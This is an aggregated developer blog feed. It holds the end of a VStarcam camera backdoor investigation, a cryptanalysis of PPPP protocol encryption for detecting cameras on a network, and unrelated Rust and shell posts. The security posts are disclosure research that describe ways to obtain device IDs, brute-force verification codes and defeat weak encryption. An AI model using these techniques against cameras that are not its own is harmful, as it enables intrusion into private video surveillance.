Mind you, even though this is clearly a backdoor I'm still not ruling out incompetence. Maybe VStarcam made a large enough mess with their dual authentication that their customer support needs to recover device access on a regular basis. However, they do have device reset functionality that should normally be used for this scenario.

In the end, for their customers it doesn't matter what the intention was. The result is a device that cannot be trusted with protecting access. For a security camera this is an unforgivable flaw.

Establishing a timeline

Now we are coming to the tough questions. Why do some firmware versions have this backdoor functionality while others don't? When was this introduced? In what order? What is the current state of affairs?

You might think that after compiling the data on 367 firmware versions the answers would be obvious. But the data is so inconsistent that any conclusions are really difficult. Thing is, we aren't dealing with a single evolving codebase here. We aren't even dealing with two codebases or a dozen of them. 367 firmware versions are 367 different codebases. These codebases are related, they share some code here and there, but they are all being developed independently.

I've seen this development model before. What VStarcam appears to be doing is: for every new camera model they take some existing firmware and fork it. They adjust that firmware for the new hardware, they probably add new features as well. None of this work makes it into the original firmware unless it is explicitly backported. And since VStarcam is maintaining hundreds of firmware variants, the older ones are usually only receiving maintenance changes if any at all.

To make this mess complete, VStarcam's firmware version numbers don't make any sense at all. And I don't mean the fact that VStarcam releases the same camera under 30 different model names, so there is no chance of figuring out the model to firmware version mapping. It's also the firmware version numbers themselves.

As I've already mentioned, the last part of the firmware version is the build number, increased with each release. The first part is the vendor ID: firmware versions starting with 48 are VStarcam's global releases whereas 66 is reserved for their Russian distributor (or rather was I think). Current VStarcam firmware is usually released with vendor ID 10 however, standing for… who knows, VeePai maybe? This leaves the two version parts in between, and I couldn't find any logic here whatsoever. Like, firmware versions sharing the third part of the version number would sometimes be closely related, but only sometimes. At the same time the second part of the version number is supposed to represent the camera model, but that's clearly not always correct either.

I ended up extracting all the logging calls from all the firmware versions and using that data to calculate a distance between every firmware version pair. I then fed this data into GraphViz and asked it to arrange the graph for me. It gave me the VStarcam spiral galaxy:

A graph with a number of green, yellow, orange, red and pink ovals, each containing a version number. The ovals aren’t distributed evenly but rather clustered. The color distribution also varies by cluster. Next image has more detailed descriptions of the clusters.

Click the image above to see the larger and slightly interactive version (it shows additional information when the mouse pointer is at a graph node). The green nodes are the ones that don't allow access to device logs. Yellow are the ones providing unauthenticated log access, always logging incoming requests including their password parameters. The orange ones have additional logging that exposes the correct password on failed authentication attempts - or they call DoSendLogToNodeServer function to send the correct password to a VStarcam server. The red ones have the backdoor in the get_online_log.cgi API leaking passwords. Finally pink are the ones which pretend to improve things by censoring parameters of logged requests - yet all of these without exception leak the password via the backdoor in the get_online_log.cgi API.

Note: Firmware version 10.165.19.37 isn't present in the graph because it is somehow based on an entirely different codebase with no relation to the others. It would be red in the graph however, as the backdoor has been implemented here as well.

Not only does this graph show the firmware versions as clusters, it's also possible to approximately identify the direction of time for each cluster. Let's add cluster names and time arrows to the image:

Clusters in the graph above marked with red letters A to F and blue arrows. A dense cluster of green node in the middle of the graph is marked as A. Left of it is cluster B with green node at its right edge that increasingly turn yellow towards the left edge. The blue arrow points from the cluster A to the left edge of cluster B. A small cluster below cluster A and B is labeled D, here green nodes at the top turn yellow and orange towards the bottom. Cluster E below cluster D has orange nodes at the top which increasingly turn pink towards the bottom with some green nodes in between. A blue arrow points from cluster D to the bottom of cluster E. A lengthy cluster at the top of the graph is labeled C, a blue arrow points from its left to its right edge. This cluster starts out green and mostly transitions towards orange along the time arrow. Finally the right part of the graph is occupy by a large cluster labeled F. The blue arrow starts at the orange nodes in the middle of this cluster and points into two directions: towards the mostly orange nodes at the bottom and towards the top where the orange nodes are first mostly replaced by the pink ones and then by red.

Of course this isn't a perfect representation of the original data, and I wasn't sure whether it could be trusted. Are these clusters real or merely an artifact produced by the graph algorithm? I verified things manually and could confirm that the clusters are in fact distinctly different on the technical level, particularly when considering updates format:

With the firmware versions ordered like this I could finally make some conclusions about the introduction of the problematic features:

The impact

So, how bad is it? Knowing the access password allows access to the camera's main functionality: audio and video recordings. But these cameras have been known for vulnerabilities allowing execution of arbitrary commands. Also, newer cameras have an API that will start a telnet server with hardcoded and widely known administrator credentials (older cameras had this telnet server start by default). So we have to assume that a compromised camera could become part of a botnet or be used as a starting point for attacks against a network.

But this requires accessing the camera first, and most VStarcam cameras won't be exposed to the internet directly. They will only be reachable via the PPPP protocol. And for that the attackers would need to know the device ID. How would they get it?

There is a number of ways, most of which I've already discussed before. For example, anybody who was briefly connected to your network could have collected device IDs of your cameras. The script to do that won't currently work with newer VStarcam cameras because these obfuscate the traffic on the PPPP level but the necessary adjustments aren't exactly complicated.

PPPP networks still support "supernodes," devices that help route traffic. Back in 2019 Paul Marrapese abused that functionality to register a rogue supernode and collect device IDs en masse. There is no indication that this trick stopped working, and the VStarcam networks are likely susceptible as well.

Users also tend to leak their device IDs themselves. They will post screenshots or videos of the app's user interface. On the first glance this is less problematic with the O-KAM Pro app because this one will display only a vendor-specific device ID (looks similar to a PPPP device ID but has seven digits and only four letters in the verification code). That is, until you notice that the app uses a public web API to translate vendor-specific device IDs into PPPP device IDs.

Anybody who can intercept some PPPP traffic can extract the device IDs from it. Even when VStarcam networks obfuscate the traffic rather than using plaintext transmission - the static keys are well known, removing the obfuscation isn't hard.

And finally, simply guessing device IDs is still possible. With only 5 million possible verification codes for each device IDs and servers not implementing rate limiting, bruteforce attacks are quite realistic.

Let's not forget the elephant in the room however: VStarcam themselves know all the device IDs of course. Not just that, they know which devices are active and where. With a password they can access the cameras of interest to them (or their government) anytime.

Coordinated disclosure attempt

Given the intentional nature of these issues, I was unsure how to deal with this. I mean, what's the point of reporting vulnerabilities to VStarcam that they are clearly aware of? In the end I decided to give them a chance to address the issues before they become public knowledge.

However, all I found was VStarcam boasting about their ISO 27001:2022 compliance. My understanding is that this requires them to have a dedicated person responsible for vulnerability management, but they are not obliged to list any security contact that can be reached from outside the company - and so they don't. I ended up emailing all company addresses I could find, asking whether there is any way to report security issues to them.

I haven't received any response, an experience that in my understanding other people already made with VStarcam. So I went with my initial publication schedule rather than waiting 90 days as I would normally do.

Recommendations

Whatever motives VStarcam had to backdoor their cameras, the consequence for the customers is: these cameras cannot be trusted. Their access protection should be considered compromised. Even with firmware versions shown as green on my map, there is no guarantee that I haven't missed something or that these will still be green after the next update.

If you want to keep using a VStarcam camera, the only safe way to do it is disconnecting it from the internet. They don't have to be disconnected physically, internet routers will often have a way to prohibit internet traffic to and from particular devices. My router for example has this feature under parental control.

Of course this will mean that you will only be able to control your camera while connected to the same network. It might be possible to explicitly configure port forwarding for the camera's RTSP port, allowing you to access at least the video stream from outside. Just make sure that your RTSP password isn't known to VStarcam.

07 Jan 2026 1:01pm GMT

This Week In Rust: This Week in Rust 633

Hello and welcome to another issue of This Week in Rust! Rust is a programming language empowering everyone to build reliable and efficient software. This is a weekly summary of its progress and community. Want something mentioned? Tag us at @thisweekinrust.bsky.social on Bluesky or @ThisWeekinRust on mastodon.social, or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub and archives can be viewed at this-week-in-rust.org. If you find any errors in this week's issue, please submit a PR.

Want TWIR in your inbox? Subscribe here.

Updates from Rust Community

Official
Newsletters
Project/Tooling Updates
Observations/Thoughts
Rust Walkthroughs
Research

Crate of the Week

This week's crate is kameo, an asynchronous actor framework with clear, trait-based abstractions for actors and typed messages.

Thanks to edgimar for the suggestion!

Please submit your suggestions and votes for next week!

Calls for Testing

An important step for RFC implementation is for people to experiment with the implementation and give feedback, especially before stabilization.

If you are a feature implementer and would like your RFC to appear in this list, add a call-for-testing label to your RFC along with a comment providing testing instructions and/or guidance on which aspect(s) of the feature need testing.

Let us know if you would like your feature to be tracked as a part of this list.

Call for Participation; projects and speakers

CFP - Projects

Always wanted to contribute to open-source projects but did not know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

If you are a Rust project owner and are looking for contributors, please submit tasks here or through a PR to TWiR or by reaching out on Bluesky or Mastodon!

CFP - Events

Are you a new or experienced speaker looking for a place to share something cool? This section highlights events that are being planned and are accepting submissions to join their event as a speaker.

If you are an event organizer hoping to expand the reach of your event, please submit a link to the website through a PR to TWiR or by reaching out on Bluesky or Mastodon!

Updates from the Rust Project

341 pull requests were merged in the last week

Compiler
Library
Cargo
Clippy
Rust-Analyzer
Rust Compiler Performance Triage

Not many PRs were merged, as it was still mostly a holiday week. #149681 caused small regressions across the board, this is pending investigation.

Triage done by @kobzol. Revision range: 112a2742..7c04f5d2

Summary:

(instructions:u) mean range count
Regressions ❌
(primary)
0.5% [0.1%, 1.4%] 146
Regressions ❌
(secondary)
0.6% [0.0%, 3.5%] 91
Improvements ✅
(primary)
-3.1% [-4.7%, -1.5%] 2
Improvements ✅
(secondary)
-0.7% [-6.4%, -0.1%] 15
All ❌✅ (primary) 0.4% [-4.7%, 1.4%] 148

2 Regressions, 0 Improvements, 7 Mixed; 4 of them in rollups 51 artifact comparisons made in total

Full report here.

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week: * build-std: context

Final Comment Period

Every week, the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

Tracking Issues & PRs

Rust

Compiler Team (MCPs only)

No Items entered Final Comment Period this week for Cargo, Rust RFCs, Leadership Council, Language Team, Language Reference or Unsafe Code Guidelines.

Let us know if you would like your PRs, Tracking Issues or RFCs to be tracked as a part of this list.

New and Updated RFCs

Upcoming Events

Rusty Events between 2026-01-07 - 2026-02-04 🦀

Virtual
Asia
Europe
North America

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Jobs

Please see the latest Who's Hiring thread on r/rust

Quote of the Week

I find it amazing that by using Rust and Miri I am using tools that are on the edge of fundamental research in Programming Languages. Actual practically usable tools that anyone can use, not arcane code experiments passed around between academics.

- ZiCog on rust-users

Thanks to Kyllingene for the suggestion!

Please submit quotes and vote for next week!

This Week in Rust is edited by:

Email list hosting is sponsored by The Rust Foundation

Discuss on r/rust

07 Jan 2026 5:00am GMT

06 Jan 2026

feedPlanet Mozilla

Olivier Mehani: Pausing a background process

It's common, in a Unix shell, to pause a foreground process with Ctrl+Z. However, today I needed to pause a _background_ process.

tl;dr: SIGTSTP and SIGCONT

The context was a queue processor spinning too fast, and preventing us from dequeuing unwanted messages.

Unsurprisingly, there are standard POSIX signals to pause and resume a target PID.

So we just need to grab the PID, and kill away.

$ kill -TSTP ${PID}
[... do what's needed ...]
$ kill -TCONT ${PID}

The post Pausing a background process first appeared on Narf.

06 Jan 2026 12:48am GMT

05 Jan 2026

feedPlanet Mozilla

Jonathan Almeida: Rebase all WIPs to the new main

A small pet-peeve with fetching the latest main on jujutsu is that I like to move all my WIP patches to the new one. That's also nice because jj doesn't make me fix the conflicts immediately!

The solution from a co-worker (kudos to skippyhammond!) is to query all immediate decendants of the previous main after the fetch.

jj git fetch
# assuming 'z' is the rev-id of the previous main.
jj rebase -s "mutable()&z+" -d main

I haven't learnt how to make aliases accept params with it yet, so this will have to do for now.

Update: After a bit of searching, it seems that today this is only possible by wrapping it in a shell script. Based on the examples in the jj documentation an alias would look like this:

[aliases]
# Update all revs to the latest main; point to the previous one.
hoist = ["util", "exec", "--", "bash", "-c", """
set -euo pipefail
jj rebase -s "mutable()&$1+" -d "main"
""", ""]

05 Jan 2026 11:10pm GMT

Wladimir Palant: Analysis of PPPP “encryption”

My first article on the PPPP protocol already said everything there was to say about PPPP "encryption":

So this thing is completely broken, why look any further? There is at least one situation where you don't know the app being used so you cannot extract the key and you don't have any traffic to analyze either. It's when you are trying to scan your local network for potential hidden cameras.

This script will currently only work for cameras using plaintext communication. Other cameras expect a properly encrypted "LAN search" packet and will ignore everything else. How can this be solved without listing all possible keys in the script? By sending all possible ciphertexts of course!

TL;DR: What would be completely ridiculous with any reasonable protocol turned out to be quite possible with PPPP. There are at most 157,092 ways in which a "LAN search" packet can be encrypted. I've opened a pull request to have the PPPP device detection script adjusted.

Note: Cryptanalysis isn't my topic, I am by no means an expert here. These issues are simply too obvious.

Contents

Mapping keys to effective keys

The key which is specified as part of the app's "init string" is not being used for encryption directly. Nor is it being fed into any of the established key stretching algorithms. Instead, a key represented by the byte sequence <semantics> b 1 , b 2 , , b n <annotation encoding="application/x-tex">b_1, b_2, \ldots, b_n</annotation></semantics> is mapped to four bytes <semantics> k 1 , k 2 , k 3 , k 4 <annotation encoding="application/x-tex">k_1, k_2, k_3, k_4</annotation></semantics> that become the effective key. These bytes are calculated as follows (<semantics> x <annotation encoding="application/x-tex">\lfloor x \rfloor</annotation></semantics> means rounding down, <semantics> <annotation encoding="application/x-tex">\otimes</annotation></semantics> stands for the bitwise XOR operation):

<semantics> k 1 = ( b 1 + b 2 + + b n ) m o d 256 k 2 = ( b 1 + b 2 + + b n ) m o d 256 k 3 = ( b 1 ÷ 3 + b 2 ÷ 3 + + b n ÷ 3 ) m o d 256 k 4 = b 1 b 2 b n <annotation encoding="application/x-tex"> \begin{aligned} k_1 &= (b_1 + b_2 + \ldots + b_n) \mod 256\\ k_2 &= (-b_1 + -b_2 + \ldots + -b_n) \mod 256\\ k_3 &= (\lfloor b_1 \div 3 \rfloor + \lfloor b_2 \div 3 \rfloor + \ldots + \lfloor b_n \div 3 \rfloor) \mod 256\\ k_4 &= b_1 \otimes b_2 \otimes \ldots \otimes b_n \end{aligned} </annotation></semantics>

In theory, a 4 byte long effective key means <semantics> 256 4 = 4,294,967,296 <annotation encoding="application/x-tex">256^4 = 4{,}294{,}967{,}296</annotation></semantics> possible values. But that would only be the case if these bytes were independent of each other.

Redundancies within the effective key

Of course the bytes of the effective key are not independent. This is most obvious with <semantics> k 2 <annotation encoding="application/x-tex">k_2</annotation></semantics> which is completely determined by <semantics> k 1 <annotation encoding="application/x-tex">k_1</annotation></semantics>:

<semantics> k 2 = ( b 1 + b 2 + + b n ) m o d 256 = ( b 1 + b 2 + + b n ) m o d 256 = k 1 m o d 256 <annotation encoding="application/x-tex"> \begin{aligned} k_2 &= (-b_1 + -b_2 + \ldots + -b_n) \mod 256\\ &= -(b_1 + b_2 + \ldots + b_n) \mod 256\\ &= -k_1 \mod 256 \end{aligned} </annotation></semantics>

This means that we can ignore <semantics> k 2 <annotation encoding="application/x-tex">k_2</annotation></semantics>, bringing the number of possible effective keys down to <semantics> 256 3 = 16,777,216 <annotation encoding="application/x-tex">256^3 = 16{,}777{,}216</annotation></semantics>.

Now let's have a look at the relationship between <semantics> k 1 <annotation encoding="application/x-tex">k_1</annotation></semantics> and <semantics> k 4 <annotation encoding="application/x-tex">k_4</annotation></semantics>. Addition and bitwise XOR operations are very similar, the latter merely ignores carry. This difference affects all the bits of the result but the lowest one, no carry to be considered here. This means that the lowest bits of <semantics> k 1 <annotation encoding="application/x-tex">k_1</annotation></semantics> and <semantics> k 4 <annotation encoding="application/x-tex">k_4</annotation></semantics> are always identical. So <semantics> k 4 <annotation encoding="application/x-tex">k_4</annotation></semantics> has only 128 possible values for any value of <semantics> k 1 <annotation encoding="application/x-tex">k_1</annotation></semantics>, bringing the total number of effective keys down to <semantics> 256 256 128 = 8,388,608 <annotation encoding="application/x-tex">256 \cdot 256 \cdot 128 = 8{,}388{,}608</annotation></semantics>.

And that's how far we can get considering only redundancies. It can be shown that a key can be constructed resulting in any combination of <semantics> k 1 <annotation encoding="application/x-tex">k_1</annotation></semantics> and <semantics> k 3 <annotation encoding="application/x-tex">k_3</annotation></semantics> values. Similarly, it can be shown that any combination of <semantics> k 1 <annotation encoding="application/x-tex">k_1</annotation></semantics> and <semantics> k 4 <annotation encoding="application/x-tex">k_4</annotation></semantics> is possible as long as the lowest bit is identical.

ASCII to the rescue

But the keys we are dealing with here aren't arbitrary bytes. These aren't limited to alphanumeric characters, some keys also contain punctuation, but they are all invariably limited to the ASCII range. And that means that the highest bit is never set in any of the <semantics> b i <annotation encoding="application/x-tex">b_i</annotation></semantics> values.

Which in turn means that the highest bit is never set in <semantics> k 4 <annotation encoding="application/x-tex">k_4</annotation></semantics> due to the nature of the bitwise XOR operation. We can once again rule out half of the effective keys, for any given value of <semantics> k 1 <annotation encoding="application/x-tex">k_1</annotation></semantics> there are only 64 possible values of <semantics> k 4 <annotation encoding="application/x-tex">k_4</annotation></semantics>. We now have <semantics> 256 256 64 = 4,194,304 <annotation encoding="application/x-tex">256 \cdot 256 \cdot 64 = 4{,}194{,}304</annotation></semantics> possible effective keys.

How large is n?

Now let's have a thorough look at how <semantics> k 3 <annotation encoding="application/x-tex">k_3</annotation></semantics> relates to <semantics> k 1 <annotation encoding="application/x-tex">k_1</annotation></semantics>, ignoring the modulo operation at first. We are taking one third of each byte, rounding it down and summing that up. What if we were to sum up first and round down at the end, how would that relate? Well, it definitely cannot be smaller than rounding down in each step, so we have an upper bound here.

<semantics> b 1 ÷ 3 + b 2 ÷ 3 + + b n ÷ 3 ( b 1 + b 2 + + b n ) ÷ 3 <annotation encoding="application/x-tex"> \lfloor b_1 \div 3 \rfloor + \lfloor b_2 \div 3 \rfloor + \ldots + \lfloor b_n \div 3 \rfloor \leq \lfloor (b_1 + b_2 + \ldots + b_n) \div 3 \rfloor </annotation></semantics>

How much smaller can the left side get? Each time we round down this removes at most two thirds, and we do this <semantics> n <annotation encoding="application/x-tex">n</annotation></semantics> times. So altogether these rounding operations reduce the result by at most <semantics> n 2 ÷ 3 <annotation encoding="application/x-tex">n \cdot 2 \div 3</annotation></semantics>. This gives us a lower bound:

<semantics> ( b 1 + b 2 + + b n n 2 ) ÷ 3 b 1 ÷ 3 + b 2 ÷ 3 + + b n ÷ 3 <annotation encoding="application/x-tex"> \lceil (b_1 + b_2 + \ldots + b_n - n \cdot 2) \div 3 \rceil \leq \lfloor b_1 \div 3 \rfloor + \lfloor b_2 \div 3 \rfloor + \ldots + \lfloor b_n \div 3 \rfloor </annotation></semantics>

If <semantics> n <annotation encoding="application/x-tex">n</annotation></semantics> is arbitrary these bounds don't help us at all. But <semantics> n <annotation encoding="application/x-tex">n</annotation></semantics> isn't arbitrary, the keys used for PPPP encryption tend to be fairly short. Let's say that we are dealing with keys of length 16 at most which is a safe bet. If we know the sum of the bytes these bounds allow us to narrow down <semantics> k 3 <annotation encoding="application/x-tex">k_3</annotation></semantics> to <semantics> 16 2 ÷ 3 = 11 <annotation encoding="application/x-tex">\lceil 16 \cdot 2 \div 3 \rceil = 11</annotation></semantics> possible values.

But we don't know the sum of bytes. What we have is <semantics> k 1 <annotation encoding="application/x-tex">k_1</annotation></semantics> which is that sum modulo 256, and the sum is actually <semantics> i 256 + k 1 <annotation encoding="application/x-tex">i \cdot 256 + k_1</annotation></semantics> where <semantics> i <annotation encoding="application/x-tex">i</annotation></semantics> is some nonnegative integer. How large can <semantics> i <annotation encoding="application/x-tex">i</annotation></semantics> get? Remembering that we are dealing with ASCII keys, each byte has at most the value 127. And we have at most 16 bytes. So the sum of bytes cannot be higher than <semantics> 127 16 = 2032 <annotation encoding="application/x-tex">127 \cdot 16 = 2032</annotation></semantics> (or 7F0 in hexadecimal). Consequently, <semantics> i <annotation encoding="application/x-tex">i</annotation></semantics> is 7 at most.

Let's write down the bounds for <semantics> k 3 <annotation encoding="application/x-tex">k_3</annotation></semantics> now:

<semantics> ( i 256 + k 1 n 2 ) ÷ 3 j 256 + k 3 ( i 256 + k 1 ) ÷ 3 <annotation encoding="application/x-tex"> \lceil (i \cdot 256 + k_1 - n \cdot 2) \div 3 \rceil \leq j \cdot 256 + k_3 \leq \lfloor (i \cdot 256 + k_1) \div 3 \rfloor </annotation></semantics>

We have to consider this for eight possible values of <semantics> i <annotation encoding="application/x-tex">i</annotation></semantics>. Wait, do we really?

Once we move into modulo 256 space again, the <semantics> i 256 ÷ 3 <annotation encoding="application/x-tex">i \cdot 256 \div 3</annotation></semantics> part of our bounds (which is the only part dependent on <semantics> i <annotation encoding="application/x-tex">i</annotation></semantics>) will assume the same value after every three <semantics> i <annotation encoding="application/x-tex">i</annotation></semantics> values. So only three values of <semantics> i <annotation encoding="application/x-tex">i</annotation></semantics> are really relevant, say 0, 1 and 2. Meaning that for each value of <semantics> k 1 <annotation encoding="application/x-tex">k_1</annotation></semantics> we have <semantics> 3 11 = 33 <annotation encoding="application/x-tex">3 \cdot 11 = 33</annotation></semantics> possible values for <semantics> k 3 <annotation encoding="application/x-tex">k_3</annotation></semantics>.

This gives us <semantics> 256 33 64 = 540,672 <annotation encoding="application/x-tex">256 \cdot 33 \cdot 64 = 540{,}672</annotation></semantics> as the number of possible effective keys. My experiments with random keys indicate that this should be pretty much as far down as it goes. There may still be more edge conditions rendering some effective keys impossible, but if these exist their impact is insignificant.

Not all effective keys are equally likely however, the <semantics> k 3 <annotation encoding="application/x-tex">k_3</annotation></semantics> values at the outer edges of the possible range are very unlikely. So one could prioritize the keys by probability - if the total number weren't already low enough to render this exercise moot.

How many ciphertexts is that?

We have the four byte plaintext F1 30 00 00 and we have 540,672 possible effective keys. How many ciphertexts does this translate to? With any reasonable encryption scheme the answer would be: slightly less than 540,672 due to a few unlikely collisions which could occur here.

But PPPP doesn't use a reasonable encryption scheme. With merely four bytes of plaintext there is a significant chance that PPPP will only use part of the effective key for encryption, resulting in identical ciphertexts for every key sharing that part. I didn't bother analyzing this possibility mathematically, my script simply generated all possible ciphertexts. So the exact answer is: 540,672 effective keys produce 157,092 ciphertexts.

And that's why you should leave cryptography to experts.

Understanding the response

Now let's say we send 157,092 encrypted requests. An encrypted response comes back. How do we decrypt it without knowing which of the requests was accepted?

All PPPP packets start with the magic byte F1, so the first byte of our response's plaintext must be F1 as well. The "encryption" scheme used by PPPP allows translating that knowledge directly into the value of <semantics> k 1 <annotation encoding="application/x-tex">k_1</annotation></semantics>. Now one could probably (definitely) guess more plaintext parts and with some clever tricks deduce the rest of the effective key. But there are only <semantics> 33 64 = 2,112 <annotation encoding="application/x-tex">33 \cdot 64 = 2{,}112</annotation></semantics> possible effective keys for each value of <semantics> k 1 <annotation encoding="application/x-tex">k_1</annotation></semantics> anyway. It's much easier to simply try out all 2,112 possibilities and see which one results in a response that makes sense.

The response here is 24 bytes large, making ambiguous decryptions less likely. Still, my experiments show that in approximately 4% of the cases closely related keys will produce valid but different decryption results. So you will get two or more similar device IDs and any one of them could be correct. I don't think that this ambiguity can be resolved without further communication with the device, but at least with my changes the script reliably detects when a PPPP device is present on the network.

05 Jan 2026 3:50pm GMT

The Rust Programming Language Blog: Project goals update — December 2025

The Rust project is currently working towards a slate of 41 project goals, with 13 of them designated as Flagship Goals. This post provides selected updates on our progress towards these goals (or, in some cases, lack thereof). The full details for any particular goal are available in its associated tracking issue on the rust-project-goals repository.

Flagship goals

"Beyond the `&`"

Continue Experimentation with Pin Ergonomics (rust-lang/rust-project-goals#389)
Progress
Point of contact

Frank King

Champions

compiler (Oliver Scherer), lang (TC)

Task owners

Frank King

1 detailed update available.

Comment by @frank-king posted on 2025-12-18:
Design a language feature to solve Field Projections (rust-lang/rust-project-goals#390)
Progress
Point of contact

Benno Lossin

Champions

lang (Tyler Mandry)

Task owners

Benno Lossin

5 detailed updates available.

Comment by @BennoLossin posted on 2025-12-07:

Since we have chosen virtual places as the new approach, we reviewed what open questions are most pressing for the design. Our discussion resulted in the following five questions:

  1. Should we have 1-level projections xor multi-level projections?
  2. What is the semantic meaning of the borrow checker rules (BorrowKind)?
  3. How should we add "canonical projections" for types such that we have nice and short syntax (like x~y or x.@y)?
  4. What to do about non-indirected containers (Cell, MaybeUninit, Mutex, etc)?
  5. How does one inspect/query Projection types?

We will focus on these questions in December as well as implementing FRTs.

Comment by @BennoLossin posted on 2025-12-12:

Canonical Projections

We have discussed canonical projections and come up with the following solution:

pub trait CanonicalReborrow: HasPlace {
    type Output<'a, P: Projection<Source = Self::Target>>: HasPlace<Target = P::Target>
    where
        Self: PlaceBorrow<'a, P, Self::Output<'a, P>>;
}

Implementing this trait permits using the syntax @$place_expr where the place's origin is of the type Self (for example @x.y where x: Self and y is an identifier or tuple index, or @x.y.z etc). It is desugared to be:

@<<Self as CanonicalReborrow>::Output<'_, projection_from_place_expr!($place_expr)>> $place_expr

(The names of the trait, associated type and syntax are not final, better suggestions welcome.)

Reasoning

  • We need the Output associated type to support the @x.y syntax for Arc and ArcRef.
  • We put the FRT and lifetime parameter on Output in order to force implementers to always provide a canonical reborrow, so if @x.a works, then @x.b also works (when b also is a field of the struct contained by x).
    • This (sadly or luckily) also has the effect that making @x.a and @x.b return different wrapper types is more difficult to implement and requires a fair bit of trait dancing. We should think about discouraging this in the documentation.
Comment by @BennoLossin posted on 2025-12-16:

Non-Indirected Containers

Types like MaybeUninit<T>, Cell<T>, ManuallyDrop<T>, RefCell<T> etc. currently do not fit into our virtual places model, since they don't have an indirection. They contain the place directly inline (and some are even repr(transparent)). For this reason, we currently don't have projections available for &mut MaybeUninit<T>.

Enter our new trait PlaceWrapper which these types implement in order to make projections available for them. We call these types place wrappers. Here is the definition of the trait:

pub unsafe trait PlaceWrapper<P: Projection<Source = Self::Target>>: HasPlace {
    type WrappedProjection: Projection<Source = Self>;

    fn wrap_projection(p: P) -> Self::WrappedProjection;
}

This trait should only be implemented when Self doesn't contain the place as an indirection (so for example Box must not implement the trait). When this trait is implemented, then Self has "virtual fields" available (actually all kinds of place projections). The name of these virtual fields/projections is the same as the ones of the contained place. But their output type is controlled by this trait.

As an example, here is the implementation for MaybeUninit:

impl<T, P: Projection<Source = T>> PlaceWrapper<P> for MaybeUninit<T> {
    type WrappedProjection = TransparentProjection<P, MaybeUninit<T>, MaybeUninit<P::Target>>;

    fn wrap_projection(p: P) -> Self::WrappedProjection {
        TransparentProjection(p, PhantomData, PhantomData)
    }
}

Where TransparentProjection will be available in the standard library defined as:

pub struct TransparentProjection<P, Src, Tgt>(P, PhantomData<Src>, PhantomData<Tgt>);

impl<P: Projection, Src, Tgt> Projection for TransparentProjection<P, Src, Tgt> {
    type Source = Src;
    type Target = Tgt;

    fn offset(&self) -> usize {
        self.0.offset()
    }
}

When there is ambiguity, because the wrapper and the wrapped types both have the same field, the wrapper's field takes precedence (this is the same as it currently works for Deref). It is still possible to refer to the wrapped field by first dereferencing the container, so x.field refers to the wrapper's field and (*x).field refers to the field of the wrapped type.

Comment by @BennoLossin posted on 2025-12-20:

Field-by-Field Projections vs One-Shot Projections

We have used several different names for these two ways of implementing projections. The first is also called 1-level projections and the second multi-level projections.

The field-by-field approach uses field representing types (FRTs), which represent a single field of a struct with no indirection. When writing something like @x.y.z, we perform the place operation twice, first using the FRT field_of!(X, y) and then again with field_of!(T, z) where T is the resulting type of the first projection.

The second approach called one-shot projections instead extends FRTs with projections, these are compositions of FRTs, can be empty and dynamic. Using these we desugar @x.y.z to a single place operation.

Field-by-field projections have the advantage that they simplify the implementation for users of the feature, the compiler implementation and the mental model that people will have to keep in mind when interacting with field projections. However, they also have pretty big downsides, which either are fundamental to their design or would require significant complification of the feature:

  • They have less expressiveness than one-shot projections. For example, when moving out a subsubfield of x: &own Struct by doing let a = @x.field.a, we have to move out field, which prevents us from later writing let b = @x.field.b. One-shot projections allow us to track individual subsubfields with the borrow checker.
  • Field-by-field projections also make it difficult to define type-changing projections in an inference friendly way. Projecting through multiple fields could result in several changes of types in between, so we would have to require only canonical projections in certain places. However, this requires certain intermediate types for which defining their safety invariants is very complex.

We additionally note that the single function call desugaring is also a simplification that also lends itself much better when explaining what the @ syntax does.

All of this points in the direction of proceeding with one-shot projections and we will most likely do that. However, we must note that the field-by-field approach might yield easier trait definitions that make implementing the various place operations more manageable. There are several open issues on how to design the field-by-field API in the place variation (the previous proposal did have this mapped out clearly, but it does not translate very well to places), which would require significant effort to solve. So at this point we cannot really give a fair comparison. Our initial scouting of the solutions revealed that they all have some sort of limitation (as we explained above for intermediate projection types for example), which make field-by-field projections less desirable. So for the moment, we are set on one-shot projections, but when the time comes to write the RFC we need to revisit the idea of field-by-field projections.

Comment by @BennoLossin posted on 2025-12-25:

Wiki Project

We started a wiki project at https://rust-lang.github.io/beyond-refs to map out the solution space. We intend to grow it into the single source of truth for the current state of the field projection proposal as well as unfinished and obsolete ideas and connections between them. Additionally, we will aim to add the same kind of information for the in-place initialization effort, since it has overlap with field projections and, more importantly, has a similarly large solution space.

In the beginning you might find many stub pages in the wiki, which we will work on making more complete. We will also mark pages that contain old or abandoned ideas as such as well as mark the current proposal.

This issue will continue to receive regular detailed updates, which are designed for those keeping reasonably up-to-date with the feature. For anyone out of the loop, the wiki project will be a much better place when it contains more content.

Reborrow traits (rust-lang/rust-project-goals#399)
Progress
Point of contact

Aapo Alasuutari

Champions

compiler (Oliver Scherer), lang (Tyler Mandry)

Task owners

Aapo Alasuutari

1 detailed update available.

Comment by @aapoalas posted on 2025-12-17:

Purpose

A refresher on what we want to achieve here: the most basic form of reborrowing we want to enable is this:

// Note: not Clone or Copy
#[derive(Reborrow)]
struct MyMutMarker<'a>(...);

// ...

let marker: MyMarkerMut = MyMutMarker::new();
some_call(marker);
some_call(marker);

ie. make it possible for an owned value to be passed into a call twice and have Rust inject a reborrow at each call site to produce a new bitwise copy of the original value for the passing purposes, and mark the original value as disabled for reads and writes for the duration of the borrow.

A notable complication appears with implementing such reborrowing in userland using explicit cals when dealing with returned values:

return some_call(marker.reborrow());

If the borrowed lifetime escapes through the return value, then this will not compile as the borrowed lifetime is based on a value local to this function. Alongside convenience, this is the major reason for the Reborrow traits work.

CoerceShared is a secondary trait that enables equivalent reborrowing that only disables the original value for writes, ie. matching the &mut T to &T coercion.

Update

We have the Reborrow trait working, albeit currently with a bug in which the marker must be bound as let mut. We are working towards a working CoerceShared trait in the following form:

trait CoerceShared<Target: Copy> {}

